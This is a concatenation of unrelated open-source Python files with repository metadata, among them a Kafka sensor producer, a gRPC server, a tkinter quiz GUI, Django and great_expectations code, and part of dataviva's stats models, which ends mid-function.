        # `config` and `parent` are mutually exclusive: a parent already
        # carries the config that should be handed down to its children.
        if parent is not None and config is not None:
            raise ValueError(
                'Only one of `config` or `parent` allowed'
                ' If you create a Component as part of another, give `parent=self`'
                ' and not `config`'
            )
        super().__init__(parent=parent, config=config, **kwargs)

        # Reject keyword arguments that do not correspond to a declared trait.
        for key, value in kwargs.items():
            if not self.has_trait(key):
                raise TraitError(f"Traitlet does not exist: {key}")

        # set up logging: child components log under their parent's logger,
        # top-level components under "<module>.<ClassName>".
        if self.parent:
            self.log = self.parent.log.getChild(self.__class__.__name__)
        else:
            self.log = getLogger(
                self.__class__.__module__ + '.' + self.__class__.__name__
            )

    @classmethod
    def from_name(cls, name, config=None, parent=None):
        """
        Obtain an instance of a subclass via its name

        Parameters
        ----------
        name : str
            Name of the subclass to obtain
        config : traitlets.loader.Config
            Configuration specified by config file or cmdline arguments.
            Used to set traitlet values.
            This argument is typically only specified when using this method
            from within a Tool.
        parent : Tool or Component
            The creating Tool or Component; passes the correct logger and
            config to the new component.
            This argument is typically only specified when using this method
            from within a Tool.

        Returns
        -------
        instance
            Instance of subclass to this class
        """
        # I/O plugins may register additional subclasses; import them first
        # so they are visible to the subclass scan below.
        detect_and_import_io_plugins()
        subclasses = {
            base.__name__: base
            for base in non_abstract_children(cls)
        }
        # A KeyError here means `name` is not a known non-abstract subclass.
        requested_subclass = subclasses[name]

        return requested_subclass(config=config, parent=parent)
| 34.223684 | 83 | 0.629566 |
795aec7d72bb2453d7dfdf2f1f588fb1376e239c | 1,050 | py | Python | kafka_producer.py | gopinathankm/End-to-End-Real-Time-Predictive-Model-model | 657e18a5fc09b1d054d193a1da0e2934bd18fa0e | [
"MIT"
] | null | null | null | kafka_producer.py | gopinathankm/End-to-End-Real-Time-Predictive-Model-model | 657e18a5fc09b1d054d193a1da0e2934bd18fa0e | [
"MIT"
] | 1 | 2019-01-28T13:40:56.000Z | 2019-01-28T13:40:56.000Z | kafka_producer.py | gopinathankm/End-to-End-Real-Time-Predictive-Model-model | 657e18a5fc09b1d054d193a1da0e2934bd18fa0e | [
"MIT"
] | null | null | null | import random
import time

from kafka import KafkaProducer
from kafka.errors import KafkaError

# Observed feature ranges noted in the original source (sampling bounds
# below round these outward):
#          AT          V           AP          RH
# min  1.810000  25.360000   992.890000   25.560000
# max 37.110000  81.560000  1033.300000  100.160000
#
# Fix: the helper functions below were originally re-defined on every loop
# iteration, and four string constants (AT/V/AP/RH) were assigned but never
# used; the helpers are now defined once and the dead assignments removed.


def getAT():
    """Random AT reading, formatted as a string with 2 decimals."""
    return str(round(random.uniform(2.0, 38.0), 2))


def getV():
    """Random V reading, formatted as a string with 2 decimals."""
    return str(round(random.uniform(26.0, 81.5), 2))


def getAP():
    """Random AP reading, formatted as a string with 2 decimals."""
    return str(round(random.uniform(993.0, 1033.0), 2))


def getRH():
    """Random RH reading, formatted as a string with 2 decimals."""
    return str(round(random.uniform(26.0, 101.0), 2))


producer = KafkaProducer(bootstrap_servers='localhost:9092')
topic = "power"

# Publish 1000 synthetic sensor readings, one per second, as JSON payloads.
for i in range(1000):
    message = "{\"AT\" : " + getAT() + "," + "\"V\" : " + getV() + "," + "\"AP\" : " + getAP() + "," + "\"RH\" : " + getRH() + "}"
    producer.send(topic, key=str.encode('key_{}'.format(i)), value=(message.encode('utf-8')))
    time.sleep(1)

producer.close()
795aecdfcea614d789c5bc1ff0e29ac8c8f242b3 | 1,552 | py | Python | Documentprocessing-project/query.py | FlashYoshi/UGentProjects | 5561ce3bb73d5bc5bf31bcda2be7e038514c7072 | [
"MIT"
] | null | null | null | Documentprocessing-project/query.py | FlashYoshi/UGentProjects | 5561ce3bb73d5bc5bf31bcda2be7e038514c7072 | [
"MIT"
] | null | null | null | Documentprocessing-project/query.py | FlashYoshi/UGentProjects | 5561ce3bb73d5bc5bf31bcda2be7e038514c7072 | [
"MIT"
] | 1 | 2019-07-18T11:23:49.000Z | 2019-07-18T11:23:49.000Z | import pagerank
from copy import deepcopy
def query(dictionary, text, pagerank, terms, indices):
    """Return up to ten documents that contain every query term.

    One postings list per term is built from the anchor-text index
    (``dictionary``) and the plain-text index (``text``); the lists are
    intersected starting from the shortest one, and the surviving documents
    are ordered by descending pagerank score before the top ten are returned.
    """
    # Build one postings list per term, preserving first-seen document order.
    postings = []
    for term in terms:
        needle = term.lower()
        docs = []
        # Anchor-text index first, then plain-text index.
        for source in (dictionary, text):
            for phrase, documents in source.items():
                if needle in phrase.lower().split(" "):
                    for doc in documents:
                        if doc not in docs:
                            docs.append(doc)
        postings.append(docs)

    # Intersect: walk the shortest list and keep documents present in every
    # other postings list.
    shortest = min(postings, key=len)
    result = [doc for doc in shortest
              if all(doc in plist for plist in postings)]

    # Highest pagerank first; the slice caps the answer at ten documents.
    result.sort(key=lambda doc: pagerank[indices[doc]], reverse=True)
    return result[:10]
result = query(dictionary, text, pr, terms, indices)
return result
| 32.333333 | 65 | 0.576031 |
795aee0789d0870aa0190388a53c4d4f112a3deb | 343 | py | Python | Src/Clova/vendor/tkinter/simpledialog.py | NishiYusuke/Line-boot-award | d77f26b9109f3cba45be5906bcb6c9314974cd92 | [
"MIT"
] | null | null | null | Src/Clova/vendor/tkinter/simpledialog.py | NishiYusuke/Line-boot-award | d77f26b9109f3cba45be5906bcb6c9314974cd92 | [
"MIT"
] | null | null | null | Src/Clova/vendor/tkinter/simpledialog.py | NishiYusuke/Line-boot-award | d77f26b9109f3cba45be5906bcb6c9314974cd92 | [
"MIT"
] | null | null | null | from __future__ import absolute_import
from future.utils import PY3
# Re-export the standard library's simple-dialog helpers under one module
# name on both Python major versions (the PY3 flag comes from the `future`
# compatibility package imported above).
if PY3:
    from tkinter.simpledialog import *
else:
    # Python 2 name for the module.
    try:
        from SimpleDialog import *
    except ImportError:
        raise ImportError('The SimpleDialog module is missing. Does your Py2 '
                          'installation include tkinter?')
| 24.5 | 79 | 0.64723 |
795aee68e75c117305753eaefee072b83d35e7d7 | 991 | py | Python | chat/migrations/0001_initial.py | kartik1718/Django_telegram | ee05222a1e709ab9aad8ad3cbe19eaa531c8ed65 | [
"MIT"
] | null | null | null | chat/migrations/0001_initial.py | kartik1718/Django_telegram | ee05222a1e709ab9aad8ad3cbe19eaa531c8ed65 | [
"MIT"
] | null | null | null | chat/migrations/0001_initial.py | kartik1718/Django_telegram | ee05222a1e709ab9aad8ad3cbe19eaa531c8ed65 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.5 on 2021-07-30 05:46
import django.contrib.auth.models
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # First migration of this app: creates the UserAuth model.
    initial = True

    dependencies = [
        # Requires django.contrib.auth's User schema to be up to date
        # before extending it via multi-table inheritance.
        ('auth', '0012_alter_user_first_name_max_length'),
    ]

    operations = [
        migrations.CreateModel(
            name='UserAuth',
            fields=[
                # One-to-one parent link back to the built-in auth.User
                # (multi-table inheritance primary key).
                ('user_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='auth.user')),
                # Extra per-user flag, default off -- presumably marks the
                # user as active/online; confirm against the app's models.
                ('active', models.BooleanField(default=False)),
            ],
            options={
                'verbose_name': 'user',
                'verbose_name_plural': 'users',
                'abstract': False,
            },
            bases=('auth.user',),
            managers=[
                # Reuse the stock UserManager so create_user etc. still work.
                ('objects', django.contrib.auth.models.UserManager()),
            ],
        ),
    ]
| 29.147059 | 184 | 0.569122 |
795aef5e54c6aae3899a01a8379b2b94656e5b0e | 2,481 | py | Python | Anime Quiz/ui.py | Samarth-Khatri/Hacktoberfest-2022 | 8111665e074528634e124d93e277ac4a45e94bc7 | [
"MIT"
] | 13 | 2021-10-03T13:10:13.000Z | 2022-01-16T15:17:34.000Z | Anime Quiz/ui.py | Samarth-Khatri/Hacktoberfest-2022 | 8111665e074528634e124d93e277ac4a45e94bc7 | [
"MIT"
] | 18 | 2021-10-03T12:44:40.000Z | 2022-03-12T01:02:33.000Z | Anime Quiz/ui.py | Samarth-Khatri/Hacktoberfest-2022 | 8111665e074528634e124d93e277ac4a45e94bc7 | [
"MIT"
] | 46 | 2021-10-03T12:35:37.000Z | 2021-12-20T04:02:03.000Z | from tkinter import *
from quiz_brain import QuizBrain
THEME_COLOR = "#375362"
class QuizzGui:
    """Tkinter front-end for a QuizBrain quiz.

    Shows one true/false question at a time, tracks the score, flashes the
    question canvas green/red as feedback, and disables the answer buttons
    when the quiz is over.
    """

    def __init__(self, quiz_brain: QuizBrain):
        self.window = Tk()
        self.quiz = quiz_brain
        self.window.title("quizz")
        self.window.config(bg=THEME_COLOR, padx=20, pady=20)

        # Score readout in the top-right corner.
        self.scorelable = Label(text="score =", bg=THEME_COLOR, font=("Courier", 18), fg='white')
        self.scorelable.grid(row=0, column=1)

        # White canvas displaying the current question text.
        self.whitescreen = Canvas(bg="white", height=250, width=300)
        self.questiontext = self.whitescreen.create_text(150, 125, width=280, text="some question", fill=THEME_COLOR, font=("Arial", 18))
        self.whitescreen.grid(row=1, column=0, columnspan=2, pady=50)

        # NOTE(review): the button wired to rightanswer() (which submits
        # "True") shows images/false.png, while the one submitting "False"
        # shows images/true.png -- confirm the image files actually match
        # the answers their buttons submit.
        self.rightImage = PhotoImage(file="images/false.png")
        self.correctImage = PhotoImage(file="images/true.png")
        self.rightbutton = Button(image=self.rightImage, border=0, command=self.rightanswer)
        self.rightbutton.grid(row=2, column=0, padx=40)
        self.correctbutton = Button(image=self.correctImage, border=0, command=self.correctanswer)
        self.correctbutton.grid(row=2, column=1, padx=40)

        self.get_next_question()
        self.window.mainloop()

    def get_next_question(self):
        """Show the next question, or end the quiz and disable the buttons."""
        if self.quiz.still_has_questions():
            q_text = self.quiz.next_question()
            self.scorelable.config(text=f"Score = {self.quiz.score}")
            self.whitescreen.itemconfig(self.questiontext, text=q_text)
        else:
            self.whitescreen.itemconfig(self.questiontext, text="You have completed the quiz")
            # Bug fix: the original passed "disabled " (trailing space),
            # which is not a valid Tk state value and raises TclError.
            self.rightbutton.config(state="disabled")
            self.correctbutton.config(state="disabled")

    def rightanswer(self):
        self.get_feedback(self.quiz.check_answer("True"))

    def correctanswer(self):
        self.get_feedback(self.quiz.check_answer("False"))

    def get_feedback(self, isright):
        """Flash the canvas green for a correct answer, red otherwise."""
        if isright:
            self.window.after(1000, self.greencolour)
        else:
            self.window.after(500, self.redcolour)

    def greencolour(self):
        self.whitescreen.configure(bg="green")
        self.window.after(500, self.whitecolour)

    def redcolour(self):
        self.whitescreen.configure(bg="red")
        self.window.after(500, self.whitecolour)

    def whitecolour(self):
        # Restore the background, then advance to the next question.
        self.whitescreen.configure(bg="white")
        self.window.after(500, self.get_next_question)
| 38.765625 | 139 | 0.648932 |
795af16a67cc8eb354a1c585cd8fa7110524f8e2 | 3,195 | py | Python | tests/data_context/test_data_context_store_configs.py | cicdw/great_expectations | 0aecddf7da591df19389c8abadbb1700a51b8739 | [
"Apache-2.0"
] | 2 | 2020-05-07T18:16:17.000Z | 2020-05-07T18:16:21.000Z | tests/data_context/test_data_context_store_configs.py | cicdw/great_expectations | 0aecddf7da591df19389c8abadbb1700a51b8739 | [
"Apache-2.0"
] | 1 | 2020-03-26T12:34:24.000Z | 2020-03-26T12:34:24.000Z | tests/data_context/test_data_context_store_configs.py | cicdw/great_expectations | 0aecddf7da591df19389c8abadbb1700a51b8739 | [
"Apache-2.0"
] | null | null | null | import pytest
import os
from ruamel.yaml import YAML
yaml = YAML()
yaml.default_flow_style = False
import great_expectations as ge
@pytest.fixture(scope="function")
def totally_empty_data_context(tmp_path_factory):
    """Pytest fixture: a DataContext with a minimal on-disk config.

    Writes a hand-built great_expectations.yml containing a single
    expectations store (and deliberately bogus names for the evaluation
    parameter and validations stores), then loads and returns a DataContext
    rooted at that directory.
    """
    # NOTE: This sets up a DataContext with a real path and a config saved to that path.
    # Now that BaseDataContext exists, it's possible to test most DataContext methods without touching the file system.
    # However, as of 2019/08/22, most tests still use filesystem-based fixtures.
    # TODO: Where appropriate, switch DataContext tests to the new method.
    project_root_dir = str(tmp_path_factory.mktemp('totally_empty_data_context'))
    os.mkdir(os.path.join(project_root_dir, 'great_expectations'))

    # Minimal config: only the expectations store is real; the other store
    # names intentionally point at stores that are never defined.
    config = {
        "config_version": 1,
        "plugins_directory": "plugins/",
        "evaluation_parameter_store_name": "not_a_real_store_name",
        "validations_store_name": "another_fake_store",
        "expectations_store_name": "expectations_store",
        "datasources": {},
        "stores": {
            "expectations_store": {
                "class_name": "ExpectationsStore",
                "store_backend": {
                    "class_name": "TupleFilesystemStoreBackend",
                    "base_directory": "expectations/"
                }
            },
        },
        "data_docs_sites": {},
        "validation_operators": {}
    }
    with open(os.path.join(project_root_dir, "great_expectations/great_expectations.yml"), 'w') as config_file:
        yaml.dump(
            config,
            config_file
        )

    context = ge.data_context.DataContext(os.path.join(project_root_dir, "great_expectations"))
    # print(json.dumps(context._project_config, indent=2))
    return context
def test_create(tmp_path_factory):
    """DataContext.create should return a DataContext instance."""
    root = str(tmp_path_factory.mktemp('path_001'))
    created_context = ge.data_context.DataContext.create(root)
    assert isinstance(created_context, ge.data_context.DataContext)
def test_add_store(totally_empty_data_context):
    """add_store registers a new store under the given name."""
    context = totally_empty_data_context
    assert len(context.stores.keys()) == 1

    context.add_store(
        "my_new_store",
        {
            "module_name": "great_expectations.data_context.store",
            "class_name": "ValidationsStore",
        },
    )

    store_names = context.stores.keys()
    assert "my_new_store" in store_names
    assert len(store_names) == 2
def test_default_config_yml_stores(tmp_path_factory):
    """A freshly created context exposes the three default stores, and
    add_store extends that set with the new store's name."""
    root = str(tmp_path_factory.mktemp('totally_empty_data_context'))
    context = ge.data_context.DataContext.create(root)

    default_stores = {
        "expectations_store",
        "validations_store",
        "evaluation_parameter_store",
    }
    assert set(context.stores.keys()) == default_stores

    context.add_store(
        "my_new_validations_store",
        {
            "module_name": "great_expectations.data_context.store",
            "class_name": "ValidationsStore",
        },
    )

    assert set(context.stores.keys()) == default_stores | {"my_new_validations_store"}
795af1d85edb54adc25d7759660b8409f733cd86 | 1,065 | py | Python | src/rpcs/services/ws_rpc_server.py | Qinnnnnn/Watero_DataCenter | fc56dc13fa9a71817de9243b494dc01ab1d193bd | [
"MIT"
] | null | null | null | src/rpcs/services/ws_rpc_server.py | Qinnnnnn/Watero_DataCenter | fc56dc13fa9a71817de9243b494dc01ab1d193bd | [
"MIT"
] | null | null | null | src/rpcs/services/ws_rpc_server.py | Qinnnnnn/Watero_DataCenter | fc56dc13fa9a71817de9243b494dc01ab1d193bd | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
File : ws_rpc_server.py
Author : Zerui Qin
CreateDate : 2018-12-28 10:00:00
LastModifiedDate : 2018-12-28 10:00:00
Note : RPC服务端测试脚本
"""
import time
from concurrent import futures
import grpc
from src.rpcs.protos import data_pipe_pb2
from src.rpcs.protos import data_pipe_pb2_grpc
_ONE_DAY_IN_SECONDS = 60 * 60 * 24
_HOST = 'localhost'
_PORT = '6000'
class DataFlow(data_pipe_pb2_grpc.DataFlowServicer):
    """gRPC servicer implementing the DataFlow service from data_pipe.proto."""

    def TransmitData(self, request, context):
        # Print the received (index, msg) pair and acknowledge with status 0.
        index = request.index
        msg = request.msg
        print(f'{index}: {msg}')
        return data_pipe_pb2.TransmitReply(status=0)
def serve():
    """Start the gRPC server on _HOST:_PORT and block until Ctrl-C.

    The server runs in a thread pool; this function idles in a sleep loop
    (grpc's start() does not block) and stops the server on KeyboardInterrupt.
    """
    grpc_server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
    data_pipe_pb2_grpc.add_DataFlowServicer_to_server(DataFlow(), grpc_server)
    # NOTE(review): insecure (plaintext) channel — fine for a local test script.
    grpc_server.add_insecure_port(_HOST + ':' + _PORT)
    grpc_server.start()
    try:
        while True:
            time.sleep(_ONE_DAY_IN_SECONDS)
    except KeyboardInterrupt:
        grpc_server.stop(0)
if __name__ == '__main__':
serve()
| 22.1875 | 78 | 0.702347 |
795af224a79a0c33f0c59b2857ae15d7ee9518b0 | 1,402 | py | Python | Externals/DeepLeague/Data Scripts/save_frames.py | yedhrab/LolRehberi | e3d0e24a63fbbdc7cba0fd6016364fb2fd105c72 | [
"Apache-2.0"
] | 2 | 2018-01-19T23:34:43.000Z | 2018-05-07T09:52:53.000Z | Externals/DeepLeague/Data Scripts/save_frames.py | yedhrab/LolRehberi | e3d0e24a63fbbdc7cba0fd6016364fb2fd105c72 | [
"Apache-2.0"
] | null | null | null | Externals/DeepLeague/Data Scripts/save_frames.py | yedhrab/LolRehberi | e3d0e24a63fbbdc7cba0fd6016364fb2fd105c72 | [
"Apache-2.0"
] | 2 | 2018-03-02T06:45:01.000Z | 2019-03-13T11:59:13.000Z | import cv2
def get_frames(test_mp4_vod_path, save_path):
    """Sample one frame per second from an MP4 file and save them as JPEGs.

    Frames are written as ``frame_<n>.jpg`` into *save_path*.

    Args:
        test_mp4_vod_path: path to the input .mp4 video.
        save_path: directory the sampled frames are written into.

    Raises:
        ValueError: if the video cannot be opened or reports a non-positive FPS.
    """
    import os  # local import: keeps the module's top-level imports untouched

    video = cv2.VideoCapture(test_mp4_vod_path)
    if not video.isOpened():
        raise ValueError("Could not open video: %s" % test_mp4_vod_path)
    print("Opened ", test_mp4_vod_path)
    print("Processing MP4 frame by frame")

    # Seek position in frames: set to fps * seconds to skip an intro.
    video.set(1, 0)

    fps = int(video.get(cv2.CAP_PROP_FPS))
    if fps <= 0:
        # Guards the division below; some containers report 0 FPS.
        raise ValueError("Video reports non-positive FPS: %s" % test_mp4_vod_path)
    total_frame_count = int(video.get(cv2.CAP_PROP_FRAME_COUNT))
    print("Loading video %d seconds long with FPS %d and total frame count %d " %
          (total_frame_count / fps, fps, total_frame_count))

    count = 0
    file_count = 0
    success = True
    while success:
        success, frame = video.read()
        if not success:
            break
        if count % 1000 == 0:
            print("Currently at frame ", count)
        # Save once every `fps` frames, i.e. ~1 frame per second; more than
        # ~2 FPS yields too much near-duplicate data.
        if count % fps == 0:
            # BUGFIX: the original wrote into BASE_DATA_PATH/<folder> via
            # undefined names (BASE_DATA_PATH, folder, Image, np) and ignored
            # save_path entirely; write the frame straight to save_path.
            cv2.imwrite(os.path.join(save_path, "frame_%d.jpg" % file_count), frame)
            file_count += 1
        count += 1

    print("Saved %d frames" % (file_count))
    video.release()
795af2dfa58324fdf84f88ddb17ff746b3888716 | 20,428 | py | Python | dataviva/attrs/models.py | Btaras/dataviva | b850ef66a2db81195709e8a8b08b778de43bf354 | [
"MIT"
] | null | null | null | dataviva/attrs/models.py | Btaras/dataviva | b850ef66a2db81195709e8a8b08b778de43bf354 | [
"MIT"
] | null | null | null | dataviva/attrs/models.py | Btaras/dataviva | b850ef66a2db81195709e8a8b08b778de43bf354 | [
"MIT"
] | null | null | null | from dataviva import db, __latest_year__
from dataviva.utils import AutoSerialize, exist_or_404, title_case
from sqlalchemy import func, Float
from sqlalchemy.sql.expression import cast
from decimal import *
from flask import g
''' A Mixin class for retrieving quick stats about a particular attribute'''
class Stats(object):
def stats(self):
from dataviva.attrs.models import Yb
from dataviva.rais.models import Ybi, Ybo, Yio, Yb_rais, Yi, Yo
from dataviva.secex.models import Ybp, Ybw, Ypw, Yb_secex, Yp, Yw
stats = []
attr_type = self.__class__.__name__.lower()
if attr_type == "wld" and self.id == "all":
attr_type = "bra"
if attr_type == "bra" and self.id == "all":
stats.append(self.get_val(Yb,"population",attr_type,"population"))
stats.append(self.get_top_attr(Yi, "num_emp", attr_type, "isic", "rais"))
stats.append(self.get_top_attr(Yo, "num_emp", attr_type, "cbo", "rais"))
stats.append(self.get_val(Yi, "wage", attr_type, "rais"))
stats.append(self.get_top_attr(Yp, "val_usd", attr_type, "hs", "secex"))
stats.append(self.get_top_attr(Yw, "val_usd", attr_type, "wld", "secex"))
stats.append(self.get_val(Yp, "val_usd", attr_type, "secex"))
elif attr_type == "bra":
stats.append(self.get_val(Yb,"population",attr_type,"population"))
stats.append(self.get_top_attr(Ybi, "num_emp", attr_type, "isic", "rais"))
stats.append(self.get_top_attr(Ybo, "num_emp", attr_type, "cbo", "rais"))
stats.append(self.get_val(Yb_rais, "wage", attr_type, "rais"))
stats.append(self.get_top_attr(Ybp, "val_usd", attr_type, "hs", "secex"))
stats.append(self.get_top_attr(Ybw, "val_usd", attr_type, "wld", "secex"))
stats.append(self.get_val(Yb_secex, "val_usd", attr_type, "secex"))
elif attr_type == "isic":
dataset = "rais"
stats.append(self.get_top_attr(Ybi, "num_emp", attr_type, "bra", dataset))
stats.append(self.get_top_attr(Yio, "num_emp", attr_type, "cbo", dataset))
stats.append(self.get_val(Yi, "wage", attr_type, dataset))
stats.append(self.get_val(Yi, "wage_avg", attr_type, dataset))
stats.append(self.get_val(Yi, "wage_avg", attr_type, dataset, __latest_year__[dataset]-5))
elif attr_type == "cbo":
dataset = "rais"
stats.append(self.get_top_attr(Ybo, "num_emp", attr_type, "bra", dataset))
stats.append(self.get_top_attr(Yio, "num_emp", attr_type, "isic", dataset))
stats.append(self.get_val(Yo, "wage", attr_type, dataset))
stats.append(self.get_val(Yo, "wage_avg", attr_type, dataset))
stats.append(self.get_val(Yo, "wage_avg", attr_type, dataset, __latest_year__[dataset]-5))
elif attr_type == "hs":
dataset = "secex"
stats.append(self.get_top_attr(Ybp, "val_usd", attr_type, "bra", dataset))
stats.append(self.get_top_attr(Ypw, "val_usd", attr_type, "wld", dataset))
stats.append(self.get_val(Yp, "val_usd_growth_pct", attr_type, dataset))
stats.append(self.get_val(Yp, "val_usd_growth_pct_5", attr_type, dataset))
stats.append(self.get_val(Yp, "val_usd", attr_type, dataset))
stats.append(self.get_val(Yp, "val_usd", attr_type, dataset, __latest_year__[dataset]-5))
elif attr_type == "wld":
dataset = "secex"
stats.append(self.get_top_attr(Ybw, "val_usd", attr_type, "bra", dataset))
stats.append(self.get_top_attr(Ypw, "val_usd", attr_type, "hs", dataset))
stats.append(self.get_val(Yw, "val_usd_growth_pct", attr_type, dataset))
stats.append(self.get_val(Yw, "val_usd_growth_pct_5", attr_type, dataset))
stats.append(self.get_val(Yw, "eci", attr_type, dataset))
stats.append(self.get_val(Yw, "val_usd", attr_type, dataset))
stats.append(self.get_val(Yw, "val_usd", attr_type, dataset, __latest_year__[dataset]-5))
return stats
''' Given a "bra" string from URL, turn this into an array of Bra
objects'''
@staticmethod
def parse_bras(bra_str):
    """Turn a "bra" string from a URL into a list of serialized Bra dicts.

    Three syntaxes are supported:
      * ``<id>.show.<n>``  -> all Bras under <id> at nesting depth <n>
      * ``<id>.<dist>``    -> all Bras within <dist> of <id>
      * ``<id>+<id>+...``  -> the listed Bras themselves
    """
    if ".show." in bra_str:
        # the '.show.' indicates that we are looking for a specific nesting
        # BUGFIX: the split result was bound to 'bar_id' (typo) while the
        # code below used 'bra_id', raising a NameError.
        bra_id, nesting = bra_str.split(".show.")
        # filter table by requested nesting level
        # BUGFIX: the length filter referenced the nonexistent 'Attr.id';
        # it must filter on Bra.id.
        bras = Bra.query \
            .filter(Bra.id.startswith(bra_id)) \
            .filter(func.char_length(Bra.id) == nesting).all()
        bras = [b.serialize() for b in bras]
    elif "." in bra_str:
        # the '.' indicates we are looking for bras within a given distance
        bra_id, distance = bra_str.split(".")
        bras = exist_or_404(Bra, bra_id)
        neighbors = bras.get_neighbors(distance)
        bras = [g.bra.serialize() for g in neighbors]
    else:
        # we allow the user to specify bras separated by '+'
        bras = bra_str.split("+")
        # Make sure the bra_id requested actually exists in the DB
        bras = [exist_or_404(Bra, bra_id).serialize() for bra_id in bras]
    return bras
    def get_top_attr(self, tbl, val_var, attr_type, key, dataset):
        """Return the top-ranked attribute of type *key* for this attribute.

        Queries *tbl* for the latest year of *dataset*, groups by the
        ``<key>_id`` column at that key's deepest nesting depth, ranks by the
        summed *val_var*, and returns a dict with the winner's name, id and
        (where computable) its share of the total.
        """
        latest_year = __latest_year__[dataset]
        # Deepest id length for each attribute type (e.g. 8-char municipality
        # ids, 6-char HS product ids).
        if key == "bra":
            length = 8
        elif key == "isic" or key == "wld":
            length = 5
        elif key == "cbo":
            length = 4
        elif key == "hs":
            length = 6
        if attr_type == "bra":
            # Per-column aggregation functions used when collapsing multiple
            # geographies into one result row.
            agg = {'val_usd':func.sum, 'eci':func.avg, 'eci_wld':func.avg, 'pci':func.avg,
                   'val_usd_growth_pct':func.avg, 'val_usd_growth_pct_5':func.avg,
                   'val_usd_growth_val':func.avg, 'val_usd_growth_val_5':func.avg,
                   'distance':func.avg, 'distance_wld':func.avg,
                   'opp_gain':func.avg, 'opp_gain_wld':func.avg,
                   'rca':func.avg, 'rca_wld':func.avg,
                   'wage':func.sum, 'num_emp':func.sum, 'num_est':func.sum,
                   'ici':func.avg, 'oci':func.avg,
                   'wage_growth_pct':func.avg, 'wage_growth_pct_5':func.avg,
                   'wage_growth_val':func.avg, 'wage_growth_val_5':func.avg,
                   'num_emp_growth_pct':func.avg, 'num_emp_pct_5':func.avg,
                   'num_emp_growth_val':func.avg, 'num_emp_growth_val_5':func.avg,
                   'distance':func.avg, 'importance':func.avg,
                   'opp_gain':func.avg, 'required':func.avg, 'rca':func.avg}
            if self.id == "all":
                top = tbl.query
            else:
                bras = self.parse_bras(self.id)
                # filter query
                if len(bras) > 1:
                    # Multiple geographies: select only the key column,
                    # aggregated across all of them.
                    col_names = ["{0}_id".format(key)]
                    col_vals = [cast(agg[c](getattr(tbl, c)), Float) if c in agg else getattr(tbl, c) for c in col_names]
                    top = tbl.query.with_entities(*col_vals).filter(tbl.bra_id.in_([b["id"] for b in bras]))
                elif bras[0]["id"] != "all":
                    top = tbl.query.filter(tbl.bra_id == bras[0]["id"])
        else:
            # Non-geography attribute: filter on this attribute's own id column.
            top = tbl.query.filter(getattr(tbl, attr_type+"_id") == self.id)
        top = top.filter_by(year=latest_year) \
            .filter(func.char_length(getattr(tbl, key+"_id")) == length) \
            .group_by(getattr(tbl, key+"_id")) \
            .order_by(func.sum(getattr(tbl, val_var)).desc())
        percent = 0
        if top.first() != None:
            if isinstance(top.first(),tuple):
                # with_entities() path: the row is a bare tuple of column
                # values, so look the attribute model up by id; no percent
                # can be computed here.
                obj = globals()[key.title()].query.get(top.first()[0])
                percent = None
            else:
                obj = getattr(top.first(),key)
                # Winner's share = its value over the sum of all grouped rows.
                num = float(getattr(top.first(),val_var))
                den = 0
                for x in top.all():
                    value = getattr(x,val_var)
                    if value:
                        den += float(value)
                percent = (num/float(den))*100
            return {"name": "top_{0}".format(key), "value": obj.name(), "percent": percent, "id": obj.id, "group": "{0}_stats_{1}".format(dataset,latest_year)}
        else:
            # No data for this year/attribute combination.
            return {"name": "top_{0}".format(key), "value": "-", "group": "{0}_stats_{1}".format(dataset,latest_year)}
    def get_val(self, tbl, val_var, attr_type, dataset, latest_year = None):
        """Return one aggregate value (e.g. total wage, total exports).

        *val_var* ``"wage_avg"`` is handled specially: the wage total is
        queried and divided by employee count afterwards. *latest_year*
        defaults to the dataset's most recent year.
        """
        if latest_year == None:
            latest_year = __latest_year__[dataset]
        if val_var == "wage_avg":
            # Query total wage, then divide by num_emp below.
            calc_var = val_var
            val_var = "wage"
        else:
            calc_var = None
        if attr_type == "bra":
            # Per-column aggregation functions used when collapsing multiple
            # geographies into one result row.
            agg = {'population':func.sum, 'val_usd':func.sum, 'eci':func.avg, 'eci_wld':func.avg, 'pci':func.avg,
                   'val_usd_growth_pct':func.avg, 'val_usd_growth_pct_5':func.avg,
                   'val_usd_growth_val':func.avg, 'val_usd_growth_val_5':func.avg,
                   'distance':func.avg, 'distance_wld':func.avg,
                   'opp_gain':func.avg, 'opp_gain_wld':func.avg,
                   'rca':func.avg, 'rca_wld':func.avg,
                   'wage':func.sum, 'num_emp':func.sum, 'num_est':func.sum,
                   'ici':func.avg, 'oci':func.avg,
                   'wage_growth_pct':func.avg, 'wage_growth_pct_5':func.avg,
                   'wage_growth_val':func.avg, 'wage_growth_val_5':func.avg,
                   'num_emp_growth_pct':func.avg, 'num_emp_pct_5':func.avg,
                   'num_emp_growth_val':func.avg, 'num_emp_growth_val_5':func.avg,
                   'distance':func.avg, 'importance':func.avg,
                   'opp_gain':func.avg, 'required':func.avg, 'rca':func.avg}
            if self.id == "all":
                col_names = [val_var]
                col_vals = [cast(agg[c](getattr(tbl, c)), Float) if c in agg else getattr(tbl, c) for c in col_names]
                total = tbl.query.with_entities(*col_vals)
                # Restrict to the shallowest nesting level so values are not
                # double-counted across nesting depths.
                if dataset == "rais":
                    total = total.filter(func.char_length(getattr(tbl,"isic_id")) == 1)
                elif dataset == "secex":
                    total = total.filter(func.char_length(getattr(tbl,"hs_id")) == 2)
                elif dataset == "population":
                    total = total.filter(func.char_length(getattr(tbl,"bra_id")) == 2)
            else:
                bras = self.parse_bras(self.id)
                # filter query
                if len(bras) > 1:
                    col_names = [val_var]
                    col_vals = [cast(agg[c](getattr(tbl, c)), Float) if c in agg else getattr(tbl, c) for c in col_names]
                    total = tbl.query.with_entities(*col_vals).filter(tbl.bra_id.in_([b["id"] for b in bras]))
                elif bras[0]["id"] != "all":
                    total = tbl.query.filter(tbl.bra_id == bras[0]["id"])
        else:
            # Non-geography attribute: filter on this attribute's own id column.
            total = tbl.query.filter(getattr(tbl, attr_type+"_id") == self.id)
        total = total.filter_by(year=latest_year).first()
        if total != None:
            if isinstance(total,tuple):
                # with_entities() path returns a bare tuple.
                val = total[0]
            else:
                val = getattr(total,val_var)
                if calc_var == "wage_avg":
                    val = float(val)/getattr(total,"num_emp")
        else:
            # No data for this year: report zero rather than None.
            val = 0
        if val_var == "population":
            group = ""
